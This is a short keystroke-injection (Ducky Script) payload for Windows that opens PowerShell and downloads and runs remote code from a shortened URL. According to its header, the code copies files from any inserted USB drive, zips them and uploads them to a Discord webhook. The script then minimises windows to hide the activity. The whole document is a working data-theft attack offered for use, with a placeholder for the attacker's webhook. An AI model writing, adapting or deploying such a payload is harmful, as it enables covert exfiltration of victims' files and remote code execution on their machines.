REM ┌────────────────────────────────────────────────────────┐
REM │ hooker01 | github.com/hooker01                          │
REM │ Description: Detects inserted USB drives, copies files  │
REM │              (excluding videos), zips them under 10MB,  │
REM │              and uploads each archive to a Discord      │
REM │              webhook.                                   │
REM │ Note: Replace 'WEBHOOK_LINK' with your URL.             │     
REM │ Target: Windows 8.1                                     │
REM └────────────────────────────────────────────────────────┘

DELAY 300
ESC
GUI r
DELAY 750
STRING powershell 
DELAY 300
STRING $dc='WEBHOOK_LINK';[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; iex (New-Object Net.WebClient).DownloadString('https://is.gd/feCDdx')"
DELAY 300
ENTER
DELAY 300
WIN m
DELAY 300
ESC
